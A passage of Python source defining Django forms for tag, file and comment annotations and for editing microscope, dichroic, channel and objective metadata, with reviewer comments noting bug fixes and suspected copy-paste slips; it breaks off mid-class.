    # annotatable object type, in the order the fields must be created.
    _OBJECT_TYPES = (
        ("images", "image"),
        ("datasets", "dataset"),
        ("projects", "project"),
        ("screens", "screen"),
        ("plates", "plate"),
        ("acquisitions", "acquisition"),
        ("wells", "well"),
        ("shares", "share"),
    )

    def __init__(self, *args, **kwargs):
        super(BaseAnnotationForm, self).__init__(*args, **kwargs)
        initial = kwargs["initial"]
        # Collapses eight identical copy-pasted stanzas of the original code
        # into one loop; field creation order and fallback behaviour are
        # preserved exactly.
        for plural, singular in self._OBJECT_TYPES:
            objects = plural in initial and initial[plural] or list()
            if len(objects) > 0:
                try:
                    self.fields[singular] = ObjectModelMultipleChoiceField(
                        queryset=objects,
                        initial=initial["selected"][plural],
                        widget=forms.SelectMultiple(attrs={"size": 10}),
                        required=False,
                    )
                except Exception:
                    # No selection info available — create the field
                    # without an initial value.
                    self.fields[singular] = ObjectModelMultipleChoiceField(
                        queryset=objects,
                        widget=forms.SelectMultiple(attrs={"size": 10}),
                        required=False,
                    )
class TagsAnnotationForm(BaseAnnotationForm):
    """
    Form for annotating one or more objects with existing Tags or New tags
    """

    def __init__(self, *args, **kwargs):
        super(TagsAnnotationForm, self).__init__(*args, **kwargs)

    # Comma-separated list of existing tag ids, posted as a hidden field.
    tags = forms.CharField(required=False, widget=forms.HiddenInput)

    def clean_tags(self):
        """Return the posted tag ids as a list of ints ([] when empty)."""
        data = self.cleaned_data["tags"]
        if not data:
            return []
        try:
            # Eager conversion (the original used a bare map(), which is lazy
            # on Python 3: a malformed id would raise outside this validator
            # and a single-use iterator would be returned instead of a list).
            data = [int(i) for i in data.split(",")]
        except Exception:
            # ValidationError requires a message; a bare ValidationError()
            # raised TypeError instead of a form error.
            raise forms.ValidationError("Tag ids must be integers")
        return data
class NewTagsAnnotationForm(forms.Form):
    """ Helper form for new tags """

    # New tag's text, description and optional parent tagset id; all posted
    # as hidden fields by the client-side tagging dialog.
    tag = forms.CharField(required=True, widget=forms.HiddenInput)
    description = forms.CharField(required=False, widget=forms.HiddenInput)
    tagset = forms.IntegerField(min_value=1, required=False, widget=forms.HiddenInput)


# Formset so several new tags can be created in one POST (extra=0: rows are
# added dynamically by the client).
NewTagsAnnotationFormSet = formset_factory(NewTagsAnnotationForm, extra=0)
class FilesAnnotationForm(BaseAnnotationForm):
    """Form for attaching existing or newly-uploaded files to objects."""

    def __init__(self, *args, **kwargs):
        super(FilesAnnotationForm, self).__init__(*args, **kwargs)
        # Existing FileAnnotations the user may link to the object(s).
        self.fields["files"] = AnnotationModelMultipleChoiceField(
            queryset=kwargs["initial"]["files"],
            widget=forms.SelectMultiple(attrs={"size": 8, "class": "existing"}),
            required=False,
        )

    # New file upload (alternative to selecting an existing annotation).
    annotation_file = forms.FileField(required=False)
class CommentAnnotationForm(BaseAnnotationForm):
    """Form for adding a text comment annotation to one or more objects."""

    comment = forms.CharField(widget=forms.Textarea(attrs={"rows": 2, "cols": 39}))
class ActiveGroupForm(forms.Form):
    """
    Drop-down of the user's groups; selecting one navigates to the
    change_active_group view (via the inline onchange JS), optionally
    carrying the current page URL so the user returns to it afterwards.
    """

    def __init__(self, *args, **kwargs):
        super(ActiveGroupForm, self).__init__(*args, **kwargs)
        try:
            # Include the current URL as a redirect target; falls back to
            # the variant without "?url=" if kwargs["initial"]["url"] is
            # missing (KeyError caught below).
            self.fields["active_group"] = GroupModelChoiceField(
                queryset=kwargs["initial"]["mygroups"],
                initial=kwargs["initial"]["activeGroup"],
                empty_label=None,
                widget=forms.Select(
                    attrs={
                        "onchange": (
                            "window.location.href='"
                            + reverse(viewname="change_active_group")
                            + "?url="
                            + kwargs["initial"]["url"]
                            + "&active_group='"
                            "+this.options[this.selectedIndex].value"
                        )
                    }
                ),
            )
        except Exception:
            self.fields["active_group"] = GroupModelChoiceField(
                queryset=kwargs["initial"]["mygroups"],
                initial=kwargs["initial"]["activeGroup"],
                empty_label=None,
                widget=forms.Select(
                    attrs={
                        "onchange": (
                            "window.location.href='"
                            + reverse(viewname="change_active_group")
                            + "?active_group='"
                            "+this.options[this.selectedIndex].value"
                        )
                    }
                ),
            )
        self.fields.keyOrder = ["active_group"]
class WellIndexForm(forms.Form):
    """
    Drop-down for picking a field (well sample) index within the range given
    by kwargs["initial"]["range"]; choices are labelled Field#1, Field#2, ...
    """

    def __init__(self, *args, **kwargs):
        super(WellIndexForm, self).__init__(*args, **kwargs)
        rmin, rmax = kwargs["initial"]["range"]
        # Value is the absolute index; label is 1-based within the range.
        field_choices = []
        for number, idx in enumerate(range(rmin, rmax + 1), start=1):
            field_choices.append((str(idx), "Field#%i" % number))
        self.fields["index"] = forms.ChoiceField(
            choices=tuple(field_choices),
            widget=forms.Select(
                attrs={
                    "onchange": ("changeField(this.options[this.selectedIndex].value);")
                }
            ),
        )
        self.fields.keyOrder = ["index"]
###############################
# METADATA FORMS
def save_metadata(obj, name, options=False):
    """
    Build the inline ``onchange`` JavaScript that saves a metadata field.

    :param obj:     id of the object being edited (interpolated via str()).
    :param name:    name of the metadata attribute to save.
    :param options: when True the handler reads the selected <option>'s
                    value (for <select> widgets) instead of ``this.value``.
    :return:        a ``javascript:save_metadata(...)`` handler string.
    """
    value_expr = "this.options[this.selectedIndex].value" if options else "this.value"
    return "javascript:save_metadata(%s, '%s', %s;" % (str(obj), name, value_expr + ")")
def set_widget_attrs(field, set_class=True):
    """
    Mark a form field's widget as disabled (metadata forms are read-only).

    :param field:     the form field whose widget attrs are updated in place.
    :param set_class: when True also apply the "disabled-metadata" CSS class.
    """
    attrs = field.widget.attrs
    attrs["disabled"] = True
    if set_class:
        attrs["class"] = "disabled-metadata"
class MetadataChannelForm(forms.Form):
    """Metadata form for a logical channel.

    Every field follows the same defensive pattern: try to build an
    editable field whose onchange handler (from ``save_metadata()``)
    saves back to the channel; if the value is absent, build the field
    without an initial value; and if anything at all goes wrong, fall
    back to a disabled "N/A" placeholder via ``set_widget_attrs()``.

    NOTE(review): when ``logicalChannel`` is None the else branches
    still dereference ``logicalCh`` (e.g. ``logicalCh.id``), so they
    raise and land in the "N/A" fallback — presumably intentional,
    but worth confirming.
    """

    def __init__(self, *args, **kwargs):
        super(MetadataChannelForm, self).__init__(*args, **kwargs)
        # Logical channel
        # Name
        logicalCh = kwargs["initial"]["logicalChannel"]
        try:
            if logicalCh is not None:
                self.fields["name"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        # Bug fix: was save_metadata(logicalCh.id) — the
                        # missing mandatory 'name' argument raised
                        # TypeError, forcing every named channel into the
                        # "N/A" fallback below.
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(logicalCh.id, "name"),
                        }
                    ),
                    initial=logicalCh.name,
                    required=False,
                )
            else:
                self.fields["name"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(logicalCh.id, "name"),
                        }
                    ),
                    required=False,
                )
                set_widget_attrs(self.fields["name"])
        except Exception:
            self.fields["name"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["name"])
        # excitationWave
        # NOTE(review): save_metadata() is passed "name" for this and most
        # other fields in this form — presumably the JS handler ignores
        # the field-name argument; confirm before relying on it.
        try:
            if logicalCh is not None:
                self.fields["excitationWave"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(logicalCh.id, "name"),
                        }
                    ),
                    initial=kwargs["initial"]["exWave"].getValue(),
                    label=("Excitation (%s)" % kwargs["initial"]["exWave"].getSymbol()),
                    required=False,
                )
            else:
                self.fields["excitationWave"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(logicalCh.id, "name"),
                        }
                    ),
                    label="Excitation",
                    required=False,
                )
                set_widget_attrs(self.fields["excitationWave"])
        except Exception:
            self.fields["excitationWave"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Excitation",
                required=False,
            )
            set_widget_attrs(self.fields["excitationWave"])
        # emissionWave
        try:
            if logicalCh is not None:
                self.fields["emissionWave"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(logicalCh.id, "name"),
                        }
                    ),
                    initial=kwargs["initial"]["emWave"].getValue(),
                    label=("Emission (%s)" % kwargs["initial"]["emWave"].getSymbol()),
                    required=False,
                )
            else:
                self.fields["emissionWave"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(logicalCh.id, "name"),
                        }
                    ),
                    label="Emission",
                    required=False,
                )
                set_widget_attrs(self.fields["emissionWave"])
        except Exception:
            self.fields["emissionWave"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Emission",
                required=False,
            )
            set_widget_attrs(self.fields["emissionWave"])
        # ndFilter
        try:
            if logicalCh is not None and logicalCh.ndFilter is not None:
                self.fields["ndFilter"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(logicalCh.id, "name"),
                        }
                    ),
                    # Stored as a fraction; displayed as a percentage.
                    initial=formatPercentFraction(logicalCh.ndFilter),
                    label="ND filter (%)",
                    required=False,
                )
            else:
                self.fields["ndFilter"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(logicalCh.id, "name"),
                        }
                    ),
                    label="ND filter (%)",
                    required=False,
                )
                set_widget_attrs(self.fields["ndFilter"], set_class=False)
        except Exception:
            self.fields["ndFilter"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="ND filter (%)",
                required=False,
            )
            set_widget_attrs(self.fields["ndFilter"], set_class=False)
        # pinHoleSize
        try:
            if logicalCh is not None and logicalCh.pinHoleSize is not None:
                self.fields["pinHoleSize"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(logicalCh.id, "name"),
                        }
                    ),
                    initial=logicalCh.pinHoleSize.getValue(),
                    label=("Pin hole size (%s)" % logicalCh.pinHoleSize.getSymbol()),
                    required=False,
                )
            else:
                self.fields["pinHoleSize"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(logicalCh.id, "name"),
                        }
                    ),
                    label="Pin hole size",
                    required=False,
                )
                set_widget_attrs(self.fields["pinHoleSize"], set_class=False)
        except Exception:
            self.fields["pinHoleSize"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Pin hole size",
                required=False,
            )
            set_widget_attrs(self.fields["pinHoleSize"], set_class=False)
        # fluor
        try:
            if logicalCh is not None:
                self.fields["fluor"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(logicalCh.id, "name"),
                        }
                    ),
                    initial=logicalCh.fluor,
                    required=False,
                )
            else:
                self.fields["fluor"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(logicalCh.id, "name"),
                        }
                    ),
                    required=False,
                )
                set_widget_attrs(self.fields["fluor"], set_class=False)
        except Exception:
            self.fields["fluor"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["fluor"], set_class=False)
        # Illumination
        try:
            if logicalCh.getIllumination() is not None:
                self.fields["illumination"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["illuminations"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                logicalCh.id, "illumination", options=True
                            )
                        }
                    ),
                    initial=logicalCh.getIllumination(),
                    required=False,
                )
            else:
                self.fields["illumination"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["illuminations"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                logicalCh.id, "illumination", options=True
                            )
                        }
                    ),
                    required=False,
                )
                set_widget_attrs(self.fields["illumination"], set_class=False)
        except Exception:
            self.fields["illumination"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["illumination"], set_class=False)
        # contrastMethods
        try:
            if logicalCh.contrastMethod is not None:
                self.fields["contrastMethod"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["contrastMethods"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                logicalCh.id, "contrastMethod", options=True
                            )
                        }
                    ),
                    initial=logicalCh.getContrastMethod(),
                    label="Contrast method",
                    required=False,
                )
            else:
                self.fields["contrastMethod"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["contrastMethods"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                logicalCh.id, "contrastMethod", options=True
                            )
                        }
                    ),
                    label="Contrast method",
                    required=False,
                )
                set_widget_attrs(self.fields["contrastMethod"])
        except Exception:
            self.fields["contrastMethod"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Contrast method",
                required=False,
            )
            set_widget_attrs(self.fields["contrastMethod"])
        # Mode
        try:
            if logicalCh.getMode() is not None:
                self.fields["mode"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["modes"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                logicalCh.id, "mode", options=True
                            )
                        }
                    ),
                    initial=logicalCh.getMode().value,
                    required=False,
                )
            else:
                self.fields["mode"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["modes"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                logicalCh.id, "mode", options=True
                            )
                        }
                    ),
                    required=False,
                )
                set_widget_attrs(self.fields["mode"])
        except Exception:
            self.fields["mode"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["mode"])
        # pockelCellSetting
        try:
            if logicalCh.pockelCellSetting is not None:
                self.fields["pockelCellSetting"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(logicalCh.id, "name"),
                        }
                    ),
                    initial=logicalCh.pockelCellSetting,
                    label="Pockel cell",
                    required=False,
                )
            else:
                self.fields["pockelCellSetting"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(logicalCh.id, "name"),
                        }
                    ),
                    label="Pockel cell",
                    required=False,
                )
                set_widget_attrs(self.fields["pockelCellSetting"])
        except Exception:
            self.fields["pockelCellSetting"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Pockel cell",
                required=False,
            )
            set_widget_attrs(self.fields["pockelCellSetting"])
        # Fixed display order for the rendered form.
        self.fields.keyOrder = [
            "name",
            "excitationWave",
            "emissionWave",
            "ndFilter",
            "pinHoleSize",
            "fluor",
            "illumination",
            "contrastMethod",
            "mode",
            "pockelCellSetting",
        ]
class MetadataDichroicForm(forms.Form):
    """Metadata form for a Dichroic (manufacturer/model/serial/lot).

    Per-field pattern: build an editable field bound to the dichroic
    when the value exists; build it without an initial when the value
    is None; on any error fall back to a disabled "N/A" placeholder.

    Bug fix: the serialNumber and lotNumber fields previously passed
    the attribute *value* (``.serialNumber`` / ``.lotNumber``) as the
    first argument of ``save_metadata()``, which expects the object id
    (as the manufacturer/model fields — and every other form in this
    module — correctly do). They now pass ``.id``.
    """

    def __init__(self, *args, **kwargs):
        super(MetadataDichroicForm, self).__init__(*args, **kwargs)
        # Manufacturer
        try:
            if kwargs["initial"]["dichroic"].manufacturer is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["dichroic"].id, "manufacturer"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["dichroic"].manufacturer,
                    required=False,
                )
            else:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["dichroic"].id, "manufacturer"
                            ),
                        }
                    ),
                    required=False,
                )
                set_widget_attrs(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["manufacturer"])
        # Model
        try:
            if kwargs["initial"]["dichroic"].model is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["dichroic"].id, "model"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["dichroic"].model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["dichroic"].id, "model"
                            ),
                        }
                    ),
                    required=False,
                )
                set_widget_attrs(self.fields["model"])
        except Exception:
            self.fields["model"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["model"])
        # Serial number
        try:
            if kwargs["initial"]["dichroic"].serialNumber is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            # Was .serialNumber — save_metadata() takes the
                            # object id, not the field value.
                            "onchange": save_metadata(
                                kwargs["initial"]["dichroic"].id,
                                "serialNumber",
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["dichroic"].serialNumber,
                    label="Serial number",
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["dichroic"].id,
                                "serialNumber",
                            ),
                        }
                    ),
                    label="Serial number",
                    required=False,
                )
                set_widget_attrs(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Serial number",
                required=False,
            )
            set_widget_attrs(self.fields["serialNumber"])
        # Lot number
        try:
            if kwargs["initial"]["dichroic"].lotNumber is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            # Was .lotNumber — save_metadata() takes the
                            # object id, not the field value.
                            "onchange": save_metadata(
                                kwargs["initial"]["dichroic"].id, "lotNumber"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["dichroic"].lotNumber,
                    label="Lot number",
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["dichroic"].id, "lotNumber"
                            ),
                        }
                    ),
                    label="Lot number",
                    required=False,
                )
                set_widget_attrs(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Lot number",
                required=False,
            )
            set_widget_attrs(self.fields["lotNumber"])
        # Fixed display order for the rendered form.
        self.fields.keyOrder = ["model", "manufacturer", "serialNumber", "lotNumber"]
class MetadataMicroscopeForm(forms.Form):
    """Metadata form for a Microscope (model/manufacturer/serial/lot/type).

    Per-field pattern: build an editable field bound to the microscope
    when the value exists; build it without an initial when the value
    is None; on any error fall back to a disabled "N/A" placeholder.

    Bug fix: the lotNumber field's else/except branches were labelled
    "Serial number" (copy-paste from the field above); they now say
    "Lot number", matching the populated branch and the other forms.
    """

    def __init__(self, *args, **kwargs):
        super(MetadataMicroscopeForm, self).__init__(*args, **kwargs)
        # Model
        try:
            if kwargs["initial"]["microscope"].model is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["microscope"].id, "model"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["microscope"].model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["microscope"].id, "model"
                            ),
                        }
                    ),
                    required=False,
                )
                set_widget_attrs(self.fields["model"])
        except Exception:
            self.fields["model"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["model"])
        # Manufacturer
        try:
            if kwargs["initial"]["microscope"].manufacturer is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["microscope"].id, "manufacturer"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["microscope"].manufacturer,
                    required=False,
                )
            else:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["microscope"].id, "manufacturer"
                            ),
                        }
                    ),
                    required=False,
                )
                set_widget_attrs(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["manufacturer"])
        # Serial number
        # NOTE(review): this field passes "lotNumber" as the save_metadata()
        # field name — looks like a copy-paste slip, but the JS handler may
        # ignore the name; left unchanged pending confirmation.
        try:
            if kwargs["initial"]["microscope"].serialNumber is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["microscope"].id, "lotNumber"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["microscope"].serialNumber,
                    label="Serial number",
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["microscope"].id, "lotNumber"
                            ),
                        }
                    ),
                    label="Serial number",
                    required=False,
                )
                set_widget_attrs(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Serial number",
                required=False,
            )
            set_widget_attrs(self.fields["serialNumber"])
        # Lot number
        try:
            if kwargs["initial"]["microscope"].lotNumber is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["microscope"].id, "lotNumber"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["microscope"].lotNumber,
                    label="Lot number",
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["microscope"].id, "lotNumber"
                            ),
                        }
                    ),
                    # Fixed: was mislabelled "Serial number".
                    label="Lot number",
                    required=False,
                )
                set_widget_attrs(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                # Fixed: was mislabelled "Serial number".
                label="Lot number",
                required=False,
            )
            set_widget_attrs(self.fields["lotNumber"])
        # Type
        try:
            if kwargs["initial"]["microscope"].getMicroscopeType() is not None:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["microscopeTypes"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["microscope"].id, "type", options=True
                            )
                        }
                    ),
                    initial=kwargs["initial"]["microscope"].getMicroscopeType().value,
                    required=False,
                )
            else:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["microscopeTypes"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                kwargs["initial"]["microscope"].id, "type", options=True
                            )
                        }
                    ),
                    required=False,
                )
                set_widget_attrs(self.fields["type"])
        except Exception:
            self.fields["type"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["type"])
        # Fixed display order for the rendered form.
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "type",
        ]
class MetadataObjectiveForm(forms.Form):
    """Metadata form for an Objective.

    Per-field pattern: try to build an editable field whose onchange
    handler (from save_metadata()) saves back to the objective; when
    the value is absent build the field without an initial; on any
    error fall back to a disabled "N/A" placeholder.

    NOTE(review): the iris field references self.BOOLEAN_CHOICES, which
    is not defined on this class (only on the subclass
    MetadataObjectiveSettingsForm below) — instantiating this class
    directly appears to send the iris field to the "N/A" fallback via
    the AttributeError; confirm intended.
    """

    def __init__(self, *args, **kwargs):
        super(MetadataObjectiveForm, self).__init__(*args, **kwargs)
        # Model
        try:
            if kwargs["initial"]["objective"].model is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "model"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objective"].model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "model"
                            ),
                        }
                    ),
                    required=False,
                )
                set_widget_attrs(self.fields["model"])
        except Exception:
            self.fields["model"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["model"])
        # Manufacturer
        try:
            if kwargs["initial"]["objective"].manufacturer is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "manufacturer"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objective"].manufacturer,
                    required=False,
                )
            else:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "manufacturer"
                            ),
                        }
                    ),
                    required=False,
                )
                set_widget_attrs(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["manufacturer"])
        # Serial Number
        try:
            if kwargs["initial"]["objective"].serialNumber is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "serialNumber"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objective"].serialNumber,
                    label="Serial number",
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "serialNumber"
                            ),
                        }
                    ),
                    label="Serial number",
                    required=False,
                )
                set_widget_attrs(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Serial number",
                required=False,
            )
            set_widget_attrs(self.fields["serialNumber"])
        # Lot number
        # NOTE(review): unlike the fields above, the first save_metadata()
        # argument here is .lotNumber (the value) rather than .id, and the
        # else branch reads the objective via
        # kwargs["initial"]["logicalchannel"].getObjective() — both look
        # like copy-paste slips; confirm against the JS handler before
        # changing.
        try:
            if kwargs["initial"]["objective"].lotNumber is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].lotNumber, "lotNumber"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objective"].lotNumber,
                    label="Lot number",
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["logicalchannel"]
                                .getObjective()
                                .lotNumber,
                                "lotNumber",
                            ),
                        }
                    ),
                    label="Lot number",
                    required=False,
                )
                set_widget_attrs(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Lot number",
